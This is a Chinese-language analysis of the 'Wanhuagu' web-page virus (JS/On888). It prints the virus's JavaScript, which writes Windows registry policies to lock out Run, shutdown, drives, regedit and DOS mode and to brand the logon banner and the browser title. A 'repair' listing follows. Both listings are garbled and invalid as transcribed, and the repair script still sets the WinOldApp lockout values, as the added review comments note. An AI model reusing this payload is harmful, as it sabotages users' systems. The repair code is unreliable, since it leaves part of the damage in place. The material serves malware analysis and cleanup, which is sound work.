“万花谷”网页病毒

/*该病毒的技术特征:
  JS/On888是一个新的含有有害代码的ActiveX网页文件,它通过一个网络地址对计算机用户造成破坏,其破坏特性如下:
  (1)用户不能正常使用WINDOWS的DOS功能程序;
  (2)用户不能正常退出WINDOWS;
  (3)开始菜单上的"关闭系统"、"运行"等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关闭REGEDIT命令等。
  (4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。*/
<script>
// Writes an empty string into the document, so nothing visible is emitted.
document.write(""); 
    /**
     * Creates an Internet-shortcut (.URL) file named DispName inside folder loc
     * that points at SiteURL, through the shell object held in the global Shl
     * (assigned in f()). Not called anywhere in this listing.
     *
     * @param {string} loc      folder the shortcut file is written into
     * @param {string} DispName file name without the ".URL" extension
     * @param {string} SiteURL  address the shortcut points to
     */
    function AddFavLnk(loc, DispName, SiteURL)
    {
      var shortcutPath = loc + "\\" + DispName + ".URL";
      var link = Shl.CreateShortcut(shortcutPath);
      link.TargetPath = SiteURL;
      link.Save();
    }
    /**
     * Payload entry point, scheduled by init() one second after the script runs.
     *
     * Obtains three COM objects through document.applets[0] (setCLSID /
     * createInstance / GetObject) and stores them in the globals Shl, FSO and
     * Net; only Shl is used here, for Shl.RegWrite. Every write sits inside two
     * nested try/catch blocks with empty handlers, so nothing is ever reported
     * to the user.
     *
     * Defender's view: the persistent artefacts are the values written under
     * HKCU\Software\Microsoft\Windows\CurrentVersion\Policies (Explorer, System,
     * WinOldApp), the HKLM Winlogon LegalNoticeCaption/LegalNoticeText banner
     * and the Internet Explorer "Window Title" strings. Cleanup is deleting (or
     * zeroing) those policy values and clearing the banner/title strings; the
     * delivery technique needs a browser that lets page script instantiate
     * shell objects through an applet, a path current browsers do not expose.
     *
     * NOTE(review): as transcribed this is not valid JavaScript — the bare line
     * "ActiveX initialization" and the registry paths broken across two lines
     * are syntax errors, and `documents .cookies` is presumably meant to be
     * `document.cookie` — so the listing documents intent rather than runnable code.
     */
    function f(){ 
  try 
  { 
  ActiveX initialization 
  // Three CLSIDs are instantiated via the applet. {F935DC22-...} is the
  // well-known CLSID of WScript.Shell (consistent with the RegWrite use of Shl);
  // the other two are commonly identified as Scripting.FileSystemObject (FSO)
  // and WScript.Network (Net), neither of which is used below.
  a1=document.applets[0]; 
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
  a1.createInstance(); 
  Shl = a1.GetObject(); 
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 
  a1.createInstance(); 
  FSO = a1.GetObject(); 
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 
  a1.createInstance(); 
  Net = a1.GetObject(); 
  try 
  { 
  // Run-once guard keyed on a "Chg" cookie. The cookie set below expires 1 ms
  // after creation (getTime() + 1), so the guard is effectively never hit.
  if (documents .cookies.indexOf("Chg") == -1) 
  { 
  // The Start Page write is commented out in this transcription; the next line
  // is its orphaned second half and is a syntax error as written.
  //Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
  "http://www.5lulu.com/"); 
  var expdate = new Date((new Date()).getTime() + (1)); 
  documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  // Explorer policy values: each of the next three writes 1 as REG_BINARY
  // (01 is a legacy octal literal, rejected in strict mode).
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoRun", 01, "REG_BINARY"); // removes "Run" from the Start menu
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoClose", 01, "REG_BINARY"); // removes "Shut Down"
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoLogOff", 01, "REG_BINARY"); // removes "Log Off"
  // NoDrives is normally a per-drive-letter bitmask; what the string "63000000"
  // becomes once RegWrite coerces it to a DWORD is not evident from this listing.
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoDrives", "63000000", "REG_DWORD"); // hides drive letters
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\System\\DisableRegistryTools", "00000001", "REG_DWORD"); // blocks the registry editor
  // WinOldApp policies: per the header description these block the DOS
  // programs and the restart-into-DOS path (symptoms (1) and (3)).
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\WinOldApp\\Disabled", "00000001", "REG_DWORD"); 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\WinOldApp\\NoRealMode", "00000001", "REG_DWORD"); 
  // Machine-wide logon banner under HKLM — presumably needs write access to HKLM.
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
  \\LegalNoticeCaption", "您的计算机已经被http://www.5lulu.com/优化: )"); 
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
  \\LegalNoticeText", "您的计算机已经被http://www.5lulu.com/优化: )"); 
  // sets the logon notice
  // IE title-bar string, written for both the machine and the current user.
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
  "新的标题★http://5lulu.com/ & http://www.5lulu.com/"); 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", 
  "新的标题★http://5lulu.com/ & http://www.5lulu.com/"); 
  // sets the IE title
  // Duplicate of the cookie write above; redundant.
  var expdate = new Date((new Date()).getTime() + (1)); 
  documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  } 
  } 
  catch(e) 
  {} // swallows every error from the registry writes
  } 
  catch(e) 
  {} // swallows failures of the object creation above
  } 
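    /**
     * Schedules f() to run one second after this script executes.
     *
     * The original passed the string "f()" to setTimeout, which the host
     * evaluates like eval(); passing the function reference does the same
     * thing without string evaluation.
     */
    function init()
    {
      setTimeout(f, 1000);
    }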
  // Entry point of the listing: starts the one-second timer that calls f().
  init();
  以下是利用一段类似的JavaScript代码修复各项的键值: 
  // Writes an empty string into the document, so nothing visible is emitted.
  document.write(""); 
    /**
     * Writes a .URL Internet shortcut called DispName into folder loc, pointing
     * at SiteURL. Relies on the shell object stored in the global Shl by f().
     * Dead code in this listing: nothing calls it.
     *
     * @param {string} loc      destination folder
     * @param {string} DispName shortcut file name, ".URL" is appended
     * @param {string} SiteURL  address the shortcut opens
     */
    function AddFavLnk(loc, DispName, SiteURL)
    {
      var fileName = DispName + ".URL";
      var shortcut = Shl.CreateShortcut(loc + "\\" + fileName);
      shortcut.TargetPath = SiteURL;
      shortcut.Save();
    }
    /**
     * Repair routine: re-applies default values to the registry entries the
     * first listing changed, using the same applet-obtained shell object (Shl)
     * and the same structure (two nested try/catch blocks with empty handlers,
     * so a failed write is not reported).
     *
     * NOTE(review): two entries are not actually repaired. WinOldApp\Disabled
     * and WinOldApp\NoRealMode are still written as "00000001" — the same
     * values the infection wrote — so the DOS-related symptoms (1) and (3)
     * from the header remain; the repair value should be "00000000", as for
     * the entries above them, or the values should be deleted outright.
     *
     * NOTE(review): the "Chg" cookie guard is the infection's own run-once
     * marker; if that cookie is present the repair is skipped entirely. It
     * expires 1 ms after being set, so this is unlikely to bite, but a repair
     * should not be conditional on it.
     *
     * As transcribed the code is not valid JavaScript (bare "ActiveX
     * initialization" line, registry paths split across lines, `documents
     * .cookies` for `document.cookie`). Restoring these values with a registry
     * editing tool or a .reg file is the dependable route and does not depend
     * on a browser that still permits this applet/ActiveX path.
     */
    function f(){ 
  try 
  { 
  ActiveX initialization 
  // Same three CLSIDs as the infection; only Shl (WScript.Shell, by its
  // well-known CLSID) is used below.
  a1=document.applets[0]; 
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
  a1.createInstance(); 
  Shl = a1.GetObject(); 
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 
  a1.createInstance(); 
  FSO = a1.GetObject(); 
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 
  a1.createInstance(); 
  Net = a1.GetObject(); 
  try 
  { 
  // Skips the whole repair when the infection's "Chg" cookie is still present.
  if (documents .cookies.indexOf("Chg") == -1) 
  { 
  // Commented-out Start Page write; the next line is its orphaned second half
  // (a syntax error as written) and does not reset the start page.
  //Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", 
  "http://www.5lulu.com/"); 
  var expdate = new Date((new Date()).getTime() + (1)); 
  documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  // Explorer policy values back to 0 (00 is a legacy octal literal).
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoRun", 00, "REG_BINARY"); // restores "Run"
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoClose", 00, "REG_BINARY"); // restores "Shut Down"
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoLogOff", 00, "REG_BINARY"); // restores "Log Off"
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoDrives", "00000000", "REG_DWORD"); // un-hides drive letters
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\System\\DisableRegistryTools", "00000000", "REG_DWORD"); // re-enables the registry editor
  // NOTE(review): still 1 on both WinOldApp entries — this re-applies the
  // lockout instead of undoing it. The repair value should be "00000000".
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\WinOldApp\\Disabled", "00000001", "REG_DWORD"); 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\WinOldApp\\NoRealMode", "00000001", "REG_DWORD"); 
  // Empties the machine-wide logon banner (HKLM; presumably needs HKLM write access).
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
  \\LegalNoticeCaption", ""); 
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
  \\LegalNoticeText", ""); 
  // clears the logon notice
  // Puts the IE title-bar string back to "Microsoft Internet Explorer" for
  // both machine and current user.
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", 
  "Microsoft Internet Explorer"); 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", 
  "Microsoft Internet Explorer"); // resets the IE title
  // Duplicate of the cookie write above; redundant.
  var expdate = new Date((new Date()).getTime() + (1)); 
  documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  } 
  } 
  catch(e) 
  {} // a failed repair write is silently dropped
  } 
  catch(e) 
  {} // a failed object creation is silently dropped
  } 
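    /**
     * Starts the repair one second later by scheduling f().
     *
     * setTimeout is given the function itself rather than the string "f()";
     * the string form is evaluated like eval() by the host, the function form
     * is equivalent and avoids that.
     */
    function init()
    {
      setTimeout(f, 1000);
    }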
  // Entry point of the repair listing: starts the one-second timer that calls f().
  init();
</script>
